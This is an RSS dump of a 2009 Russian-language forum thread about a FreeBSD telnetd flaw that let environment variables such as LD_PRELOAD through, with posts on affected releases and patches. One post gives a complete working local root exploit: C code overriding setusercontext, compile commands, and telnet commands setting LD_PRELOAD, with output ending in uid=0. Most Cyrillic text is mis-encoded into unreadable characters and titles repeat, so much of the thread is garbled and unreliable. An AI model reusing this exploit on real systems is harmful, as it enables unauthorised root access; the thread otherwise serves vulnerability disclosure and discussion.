OpenForum RSS: �� root �� telnetd �� FreeBSD

�� root �� telnetd �� FreeBSD (aurved)

Wed, 18 Feb 2009 11:16:46 GMT

recent changes in FreeBSD's environment-handling
code rendered telnetd's scrubbing inoperative, thereby allowing potentially
harmful environment variables to be set.

RECENT CHANGES -- �� 7.0 � 7.1 ��, �� 6-�� . � � �� environment-handling
code �� .

�� root �� telnetd �� FreeBSD (��... (PereresusNeVlezaetBuggy)

Wed, 18 Feb 2009 06:10:53 GMT

>[�� ]
>
>===>
>�� 1: �� FreeBSD.
>�� FreeBSD 7.0-RELEASE, 7.1-RELEASE, 7-STABLE � 8-CURRENT. ��
>�� 7.1-RELEASE-p10, 7.0-RELEASE-p3, 7.1-STABLE � �� .
>
>===>
>
>�� 7.1-RELEASE-p3, 7.0-RELEASE-p10
>�� FreeBSD - �� :)

��

"�� OpenBSD, NetBSD � �� ."

��

"NetBSD � OpenBSD �� , � DragonFly BSD �� 14.02.2008; �� *BSD-�� ӣ �ݣ �� ."

�� root �� telnetd �� FreeBSD (�� ) (��)

Wed, 18 Feb 2009 06:03:41 GMT

� �� - �� !!!

===>
�� 1: �� FreeBSD. �� FreeBSD 7.0-RELEASE, 7.1-RELEASE, 7-STABLE � 8-CURRENT. �� 7.1-RELEASE-p10, 7.0-RELEASE-p3, 7.1-STABLE � �� .
===>

�� 7.1-RELEASE-p3, 7.0-RELEASE-p10
�� FreeBSD - �� :)

�� root �� telnetd �� FreeBSD (��)

Tue, 17 Feb 2009 18:47:53 GMT

> �� nmap � �� ?!

�� nmap. �� sockstat(1). ��.

sockstat -l46

�� root �� telnetd �� FreeBSD (Frank)

Tue, 17 Feb 2009 13:00:33 GMT

��, �� 2000 vps ��Σ�� ݣ �� ssh, �� :)

�� root �� telnetd �� FreeBSD (metallic)

Tue, 17 Feb 2009 10:32:46 GMT

>telnet �� .

� �� ?

�� root �� telnetd �� FreeBSD (metallic)

Tue, 17 Feb 2009 10:32:24 GMT

��, � �� :)

�� root �� telnetd �� FreeBSD (�� ) (��)

Tue, 17 Feb 2009 07:08:44 GMT

�� ...

%id
uid=1001(test) gid=1001(test) groups=1001(test)
%cd /tmp
%cat >test.c
#include <sys/types.h>
#include <login_cap.h>
#include <stdio.h>

int
setusercontext(login_cap_t *lc, const struct passwd *pwd, uid_t uid,
unsigned int flags)
{
printf("Xa-xa!\n");
return (0);
}
%cc -c -o test.so -fPIC test.c
%cc -shared -o libtest.so.0.0 test.so
%telnet
telnet> aut dis sra
telnet> env def LD_PRELOAD /tmp/libtest.so.0.0
telnet> ope localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

FreeBSD/i386 (shit.home.lan) (ttyp3)

Password:
Xa-xa!
Last login: Tue Feb 17 12:51:07 from form.win.alveis.
Xa-xa!
Copyright (c) 1992-2009 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 7.1-RELEASE (GENERIC) #0: Thu Jan 1 14:37:25 UTC 2009

Welcome to FreeBSD!

%id
uid=0(root) gid=0(wheel)

�� root �� telnetd �� FreeBSD (�� ) (��)

Tue, 17 Feb 2009 07:07:12 GMT

�� - �� , � �� . �� , �� ...

OpenForum RSS: ��������� root ���������� ����� telnetd ����� �� FreeBSD

��������� root ���������� ����� telnetd ����� �� FreeBSD (aurved)

��������� root ���������� ����� telnetd ����� �� FreeBSD (��... (PereresusNeVlezaetBuggy)

��������� root ���������� ����� telnetd ����� �� FreeBSD (����������� ����) (����������)

��������� root ���������� ����� telnetd ����� �� FreeBSD (������)

��������� root ���������� ����� telnetd ����� �� FreeBSD (Frank)

��������� root ���������� ����� telnetd ����� �� FreeBSD (metallic)

��������� root ���������� ����� telnetd ����� �� FreeBSD (metallic)

��������� root ���������� ����� telnetd ����� �� FreeBSD (����������� ����) (�����)

��������� root ���������� ����� telnetd ����� �� FreeBSD (����������� ����) (�����)

OpenForum RSS: �� root �� telnetd �� FreeBSD

�� root �� telnetd �� FreeBSD (aurved)

�� root �� telnetd �� FreeBSD (��... (PereresusNeVlezaetBuggy)

�� root �� telnetd �� FreeBSD (�� ) (��)

�� root �� telnetd �� FreeBSD (��)

�� root �� telnetd �� FreeBSD (Frank)

�� root �� telnetd �� FreeBSD (metallic)

�� root �� telnetd �� FreeBSD (metallic)

�� root �� telnetd �� FreeBSD (�� ) (��)

�� root �� telnetd �� FreeBSD (�� ) (��)